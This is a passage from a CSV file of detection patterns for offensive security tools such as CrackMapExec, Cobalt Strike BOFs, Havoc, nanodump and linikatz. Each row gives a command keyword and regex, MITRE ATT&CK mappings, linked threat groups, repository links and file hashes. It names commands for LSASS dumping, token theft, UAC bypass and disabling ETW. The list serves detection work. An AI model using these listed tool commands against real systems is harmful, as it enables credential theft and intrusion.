tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "cme smb -*","cme\ssmb\s\-.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "cme winrm *","cme\swinrm\s.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "dcenum *","dcenum\s.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "delete_file *.dll","delete_file\s.{0,1000}\.dll","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "detect-hooks","detect\-hooks","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","0","N/A","10","10","147","30","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" "doc.1a.*\.*","doc\.1a\..{0,1000}\\\..{0,1000}","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" "doc.4a.*\.*","doc\.4a\..{0,1000}\\\..{0,1000}","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" "doc.bc.*\.*","doc\.bc\..{0,1000}\\\..{0,1000}","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" "doc.md.*\.*","doc\.md\..{0,1000}\\\..{0,1000}","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" "doc.po.*\.*","doc\.po\..{0,1000}\\\..{0,1000}","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" "doc.tx.*\.*","doc\.tx\..{0,1000}\\\..{0,1000}","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" "doc-stg-prepend*.*","doc\-stg\-prepend.{0,1000}\..{0,1000}","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" "doc-stg-sh*.*","doc\-stg\-sh.{0,1000}\..{0,1000}","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" "dumpwifi *","dumpwifi\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","0","N/A","10","10","517","52","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" "e69a6f8e45f8dd8ee977b6aed73cac25537c39f6fb74cf9cc225f2af1d9e4cd7","e69a6f8e45f8dd8ee977b6aed73cac25537c39f6fb74cf9cc225f2af1d9e4cd7","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","0","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "etw stop","etw\sstop","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","0","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "EVUAC *","EVUAC\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","0","N/A","10","10","112","35","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" "exploit -j -z","exploit\s\-j\s\-z","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","247","72","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "f1696fdc28bdb9e757a14b2ba9e698af8f70bb928d3c9e9fb524249f20231d08","f1696fdc28bdb9e757a14b2ba9e698af8f70bb928d3c9e9fb524249f20231d08","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","0","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "f3aacbbaacceb0bdcac49d9b5e1da52d6883b7d736ca68f0a98f5a1d4838b995","f3aacbbaacceb0bdcac49d9b5e1da52d6883b7d736ca68f0a98f5a1d4838b995","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","0","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "fw_walk display*","fw_walk\sdisplay.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","0","N/A","10","10","99","14","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z" "fw_walk status*","fw_walk\sstatus.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","0","N/A","10","10","99","14","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z" "fw_walk total*","fw_walk\stotal.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","0","N/A","10","10","99","14","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z" "get-delegation *","get\-delegation\s.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","10","10","133","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "get-delegation *","get\-delegation\s.{0,1000}","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","133","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "get-spns *","get\-spns\s.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","10","10","133","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "grab_token *","grab_token\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "http://tor2web.*","http\:\/\/tor2web\..{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense 